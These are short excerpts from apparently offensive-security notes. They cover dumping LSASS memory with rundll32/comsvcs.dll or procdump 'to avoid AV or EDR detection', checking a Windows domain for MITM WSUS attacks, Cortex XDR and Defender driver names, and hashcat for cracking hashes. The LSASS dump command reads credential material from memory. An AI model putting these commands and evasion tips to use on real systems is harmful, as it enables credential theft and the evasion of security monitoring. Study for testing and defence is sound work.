Dumping LSASS different ways

A few techniques to avoid AV or EDR detection:
1. rundll32 C:\windows\system32\comsvcs.dll MiniDump “[LSASS_PID] dump.bin full”
2. procdump <process id> instead of the word lsass. Signed executable which can also be used.
3....

WSUS attacks

To check whether a Windows domain is a possible candidate for a MITM WSUS attack, check:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
https://github.com/pimps/wsuxploit/ (requires a MITM attack, for example with bettercap)...

Cortex XDR components

WdFilter.sys : antimalware, malware
WdNisDrv.sys : defender
cyvrfsfd.sys : Palo Alto Networks
cyvrlpc.sys : Palo Alto Networks
tedrdrv.sys : Palo Alto Networks
cyvrmtgn.sys : Palo Alto Networks
cyverak.sys : cyvera, Palo Alto Networks...

Hashcat

https://hashcat.net/hashcat/ and https://github.com/hashcat
It’s a tool that lets you bruteforce hashes. Hashcat 6.0 is the latest version and supports around 208 different hash types! You can use the CPU or the GPU to compute...